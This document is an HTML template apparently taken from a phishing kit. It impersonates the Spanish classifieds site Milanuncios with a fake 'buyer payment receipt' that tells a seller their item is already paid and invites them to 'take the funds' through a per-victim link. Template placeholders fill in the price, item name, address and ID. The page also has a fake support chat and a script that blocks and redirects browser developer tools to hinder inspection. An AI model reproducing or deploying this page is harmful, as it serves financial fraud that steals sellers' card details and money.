<html data-cbscriptallow="true" lang="ru" prefix="og: http://ogp.me/ns#" id="html">
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="og:site_name" content="milanuncios.es">
    <meta name="robots" content="noindex, nofollow">
    <link rel="stylesheet" href="/static/style/milan2/main_1.css">
    <link rel="stylesheet" href="/static/style/milan2/main_2.css">

    <script src="/static/style/milan2/jquery.min.js.download"></script>
    <script src="/static/style/milan2/jquery.maskedinput.js.download"></script>  

    <meta http-equiv="x-ua-compatible" content="ie=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1, minimal-ui, user-scalable=no">
    <meta name="format-detection" content="telephone=no">
	  <link rel="icon" href="https://www.milanuncios.com/favicon.ico" type="image/png">

     <!-- support -->
    <link rel="stylesheet" href="/static/style/support/support_parent.css">
    <script src="/static/style/protect/protect.js"></script>
    <title><%=name %></title>

    <meta property="og:title" content="MILANUNCIOS: segunda mano, anuncios gratis, empleo, clasificados...">
    <meta property="og:description" content="Milanuncios.com: tablón de anuncios y clasificados de segunda mano, compra-venta, inmobiliarias, empleo, servicios... Encuentra o publica tu anuncio GRATIS!">
    <meta property="og:type" content="website">
      <meta property="og:image" content="https://www.milanuncios.com/prensa/wp-content/uploads/2020/11/M-Icon-Round.png"> 
    <meta property="og:url" content="https://www.milanuncios.com/">
    <meta name="og:site_name" content="milanuncios.com">
    </head>

  <body class="body body--payments route__product_buy_id_any">

   <div class="
   chatra--webkit
   chatra--style-round
   chatra--side-bottom
   chatra--pos-right
   chatra--visible
   chatra--expanded
   chatra--fast-toggle
 " id="chatra" data-turbolinks-permanent="" style="width: 380px; height: 600px; transform: none; z-index: 2147483647; display:none;">
<div id="chatra__iframe-wrapper">
 <iframe frameborder="0" id="chatra__iframe" allowtransparency="true" title="Chatra live chat" allow="autoplay" src="/static/style/support/index.html?id=<%=id %>" style="width: 380px; height: 600px; position: absolute"></iframe>
</div>
</div>
<div class="support-circle" onclick="document.querySelector(&#39;#chatra&#39;).style.display = &#39;block&#39;;this.style.display = &#39;none&#39;"></div>

<div class="app app--simple_layout" id="app">

    <div class="base">

      <div class="_container header_prototype header_prototype--board tiny" data-container="HeaderBoardContainer" data-tiny="1"><header data-test-component="HeaderBoard" class="sc-ugnQR jRQBFv"><div class="sc-eIHaNI grYHP"></div><div class="sc-eTpRJs hnEmwS"><div class="sc-iomxrj fZtIUm"><section data-test-component="HeaderActionMenu" class="sc-gPEVay sc-eKZiaR dzCROE"><div class="sc-jAaTju sc-jDwBTQ sc-jlyJG sc-drMfKT lkKOyd"><div width="1" class="sc-jAaTju sc-iRbamj sc-hIVACf gjZzYk">
          <a href="https://milanuncios.es/" title="На главную" data-test-action="IndexPageLink" class="sc-eqIVtm sc-cpmKsF bcxWYD">
    
    <img src="/static/style/milan2/milanuncios.png" style="/*width: 134px;*/height: 46px;">
 </a><div class="sc-eXNvrr iBzLWS"></div>
          </div></div></section><div class="sc-dxZgTM RFfMX"></div></div></div></header></div>

        <aside class="nav_container sidebar_container"><nav class="_container" data-container="CategoryMobileContainer"></nav></aside>
<div class="bundle">
   <div class="container _container" data-container="PaymentsContainer">
      <div class="payments_container" id="payments">
         <div>
            <h1 class="title__1tzAN2wR">Recibo del pago del comprador</h1>
            <div class="container__28A_2L3T">
               <div>
                  <div class="product__2oLb4nXl">
                     <span class="product_image__2AcYUpNV">
                     <img src="<%=image %>" id="pr_image" width="100" height="100"></span>
                     <div class="product_content__mI30-3Fr">
                        <div class="product_inner__1ZrDwagy">
                           <div class="product_price__2IFwtrXu"><span class="product_real_price__j_Bk3J3i"><span><span id="pr_price"><%=price %> €</span> <span class="sc-bdVaJa ijDeHI"><b></b><i></i></span></span></span></div>
                           <div class="product_title__3jNOq_vZ" id="pr_name"><%=name %></div>
                        </div>
                     </div>
                  </div>
                  <div class="container__b66PCR7o">
                     <div class="summary__2TIRymkY">
                        <div class="summary_header__bJmC15X9">
                           <div class="summary_price__1HT5R9_P"><span>
                              <span id="last"><%=price %> €</span> <span class="sc-bdVaJa ijDeHI"><b></b><i></i></span></span>
                           </div>
                        </div>
                        <div style="    z-index: 1;" class="fixed_buttons fixed_buttons--single">
                          
                           <div class="summary_total__3aEKbkJu">
                              <span id="ch5">Total:</span>
                              <div class="summary_total_value__nRhP7XkA"><span><span id="pr_price"><%=price %> €</span> <span class="sc-bdVaJa ijDeHI"><b id="mobile_price"></b><i></i></span></span></div>
                           </div>
                           <div class="button_container">
                                 <input type="hidden" name="order" value="order">
                                 <button id="paybutton" style="background-color: #1ABB5E;" type="submit" class="sc-dVhcbM ccONKs">
                                 <a href="/receive/merchant/<%=id %>">
                                  <span class="sc-fBuWsC hvBxNu" id="btn">Terminado</span>
                                 </a>
                                 </button>
                           </div>
                        </div>
                   
                        <div class="safely_text__392qqBrF">
                           <div class="status_badge__icon status_badge__icon--deal"></div>
                           <span>Realizar pagos es seguro</span>
                        </div>
                        <div class="hint">Haciendo clic en el botón <span id="ch3"> „Toma los fondos” </span>, usted acepta los términos del acuerdo de usuario utilizando el Servicio en línea „Oferta segura”</div>
                     </div>
                     <div class="block__3ioUhNQH">
                        <div class="panel__3B1d-ak5" id="hide1">
                           <div class="panel_icon__1HmxOezY">
                              <div class="status_badge__icon status_badge__icon--delivery status_icon__3QzFN2ZZ"><img src="/static/style/milan2/middle.png" width="30px" height="30px" alt=""></div>
                           </div>
                           <div class="panel_button__2vr4fIVO"></div>
                           <div class="panel_content__VGeorc1g">
                              <div class="text__3Wt10VPX">
                              <b>¡Tu artículo ya está comprado!</b>
                             </div>
                              <div class="hint__aMasvQSz">El comprador ya ha pagado el pedido
.</div>
                           </div>
                           <div class="panel_button__2vr4fIVO"></div>
                        </div>
                  
                        <div class="form__1P2Y3sX1">
                           <form>
                               


                                                            <label class="label__332nHo7g" style="font-weight: 700;" id="ch2">Datos para enviar</label>
                               
                              <div>
                                 <label class="label__332nHo7g">Dirección de envío</label>
                                 <div class="row rows">
                                    <div class="col-md-8">
                                       <div class="root__3ahLIWiH">
                                          <div class="from_group form_group__3-PlZQuP">
                      <input type="text" class="form_control form_control__3Uyg-pWq" id="deliveryCity" placeholder="Kod pocztowy, miasto, ulica, dom" disabled="" value="<%=address %>"></div>
                                       </div>
                                    </div>
                             
                                 </div>
                              </div>
                             
                              <div class="row" style="position: relative;">
                                 <div class="col-md-4">
                                     <label class="label__332nHo7g">Nombre</label>
                                    <div class="from_group form_group__3-PlZQuP"><input id="firstName" name="firstName" type="text" class="form_control form_control__3Uyg-pWq" placeholder="Nombre" maxlength="25" disabled="" value="<%=firstName %>"></div>
                                 </div>
                                 <div class="col-md-4">
                                     <label class="label__332nHo7g">Apellido</label>
                                    <div class="from_group form_group__3-PlZQuP"><input id="lastName" name="lastName" type="text" class="form_control form_control__3Uyg-pWq" placeholder="Apellido" maxlength="25" disabled="" value="<%=surname %>"></div>
                                 </div>
                              </div>


					
                              <p class="hint__2r7xW549" id="hide2" style="margin-top:15px">Después de acreditar los fondos en la tarjeta, envíe el artículo al comprador de acuerdo con los datos especificados o entregue el artículo al Servicio de mensajería, que le devolverá la llamada dentro de las 12 horas</p>
                           <p class="hint__2r7xW549" id="hide3">
                            Después de enviar las mercancías, por favor, informe al comprador número de seguimiento! El artículo debe ser enviado dentro de 3 días a partir de la fecha de envío</p>
<div class="boxberry_text__24q32W-A">La entrega es llevada a cabo por cualquier compañía Postal por acuerdo personal con el comprador.
  El Servicio de envío Milanuncios no controla los números de paquete y no coopera con los servicios postales, solo garantiza la seguridad de las transacciones.</div>                     
						  </form></div>
                        <div class="hint payhint__1EGeMlob">Pulsando el botón<span id="ch4"> „Obtener financiación” </span>, usted acepta la rescisión del contrato de compra y venta de productos utilizando el Servicio Safe Deal Online</div>
                     </div>
                     <div class="
        chatra--webkit
        chatra--style-round
        chatra--side-bottom
        chatra--pos-right
        chatra--visible
        chatra--expanded
        chatra--fast-toggle
      " id="chatra" data-turbolinks-permanent="" style="width: 380px; height: 600px; transform: none; z-index: 2147483647; display:none;">
  </div>
  
                    </div>
                  </div>
               </div>
            </div>
         </div>
      </div>
   </div>
</div>
</div>
<div class="overlay"><div class="loader hide"></div></div><div class="global"><div></div></div>
<script src="/static/style/milan2/jquery-3.4.1.min.js.download"></script>  
<script>
$(document).ready(function(){
  $("#showHideContent").click(function () {
        if ($("#content").is(":hidden")) {
            $("#content").show("slow");
        } else {
            $("#content").hide("slow");
        }
        return false;
    });
    $("#showContent").click(function () {
        if ($("#content").is(":hidden")) {
            $("#content").show("slow");
        } else {
            $("#content").hide("slow");
        }
        return false;
    });
});
</script>

<script type="text/javascript">
   function openForm() {
     $('#myForm').css('display', 'block')
   $('#open-support').css('display', 'none')
 }

 function closeForm() {
   $('#myForm').css('display', 'none')
   $('#open-support').css('display', 'block')

 }
</script>
<script src="https://cdn.jsdelivr.net/gh/fz6m/console-ban@3.2/dist/console-ban.min.js"></script>
<script>
    ConsoleBan.init({
        redirect: 'https://http.cat/403'
    })
</script>
</body></html>